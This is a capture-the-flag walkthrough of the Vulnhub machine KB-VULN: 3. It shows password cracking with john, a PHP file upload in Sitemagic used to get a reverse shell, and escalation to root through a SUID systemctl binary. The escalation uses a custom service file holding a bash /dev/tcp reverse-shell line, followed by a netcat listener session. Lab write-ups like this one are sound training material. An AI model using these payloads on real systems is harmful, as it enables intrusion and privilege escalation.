Vulnhub - KB-VULN: 3
This machine is the kind that will measure your research ability. This VM is running on VirtualBox. It includes 2 flags:user.txt and root.txt.
This is KB-VULN: 3 from vulnhub. After doing Tenderfoot I rolled straight into this one and knocked it over too.
This box has:
- 22/tcp open ssh
- 80/tcp open http
- 139/tcp open netbios-ssn
- 445/tcp open microsoft-ds
So, SSH, HTTP and SMB; gotcha.
We have anonymous login to SMB; I used nautilus. I’ve been liking it lately.
In the share we find which has a password protected note file in it. No problem:
root@kali:/opt/vulnhub/kbvuln3# john website.john -w=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porchman (
1g 0:00:00:00 DONE (2020-10-26 07:49) 1.612g/s 7372Kp/s 7372Kc/s 7372KC/s porkedmark21..pop1937
Use the "--show" option to display all of the cracked passwords reliably
Session completed
What’s the contents?
Hi Heisenberg! Your website is activated. –> kb.vuln
Username : admin
Password : jesse
Have a good day !
So we have some credentials. Let’s check out the website. Also I added kb.vuln to /etc/hosts, but it probably wasn’t necessary.
The website is running Sitemagic, same as Cewlkid: 1. So we have arbitrary PHP file upload. I use the GUI to upload a shell and find it at:
Note: the file is called plugin because I originally used it for a Wordpress thing. It’s nothing special, just a bash reverse shell.
I catch the shell in a listener and we’re away.
We’ve only got one prominent user (heisenberg) and they’re in the sudo group so we’re probably going there or direct to root. Linpeas says systemctl has the SUID bit set; so that’s our method.
GTFOBins has a technique, but it fails. Hmmm. I try a slightly different custom service, but get an error:
Failed to lookup unit file state: Invalid argument
There doesn’t appear to be anything wrong with the service file, but the system isn’t happy. After some trawling through stackoverflow and other places, I visit /etc/systemd/system/ and find a broken symlink:
0 lrwxrwxrwx 1 root root 29 Oct 2 18:53 root.service -> /home/heisenberg/root.service
The /home/heisenberg/root.service file does not exist. I can’t remove it with rm; I don’t have permission. However:
www-data@kb-server:/etc/systemd/system/$ systemctl disable root.service
<$ systemctl disable root.service
Removed /etc/systemd/system/
Removed /etc/systemd/system/root.service.
This got rid of the problem. On to root!
My service looked like this:
root@kali:/opt/vulnhub/kbvuln3# cat toor.service
ExecStart=/bin/bash -c "/bin/bash -i >& /dev/tcp/ 0>&1"
And it was located in /dev/shm. With the broken symlink out of the way:
www-data@kb-server:/etc/systemd/system/$ systemctl enable /dev/shm/toor.service
<arget.wants$ systemctl enable /dev/shm/toor.service
Created symlink /etc/systemd/system/ -> /dev/shm/toor.service.
Created symlink /etc/systemd/system/toor.service -> /dev/shm/toor.service.
www-data@kb-server:/etc/systemd/system/$ systemctl start toor
<ystem/$ systemctl start toor
And in my listener:
root@kali:/opt/vulnhub/kbvuln3# nc -nvlp 1235
Ncat: Version 7.91 ( )
Ncat: Listening on :::1235
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
bash: cannot set terminal process group (5763): Inappropriate ioctl for device
bash: no job control in this shell
root@kb-server:/# whoami
root@kb-server:/# cd /root
cd /root
root@kb-server:~# ls -lash
ls -lash
total 36K
4.0K drwx------ 4 root root 4.0K Oct 2 18:12 .
4.0K drwxr-xr-x 24 root root 4.0K Oct 26 08:53 ..
4.0K -rw------- 1 root root 38 Oct 2 18:54 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
4.0K drwxr-xr-x 3 root root 4.0K Oct 2 16:33 .local
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw-r--r-- 1 root root 1.1K Oct 2 15:55 root.txt
4.0K drwx------ 2 root root 4.0K Oct 2 16:18 .ssh
4.0K -rw------- 1 root root 873 Oct 2 16:40 .viminfo
root@kb-server:~# cat root.txt
cat root.txt
ASCII Art removed
Neato completo.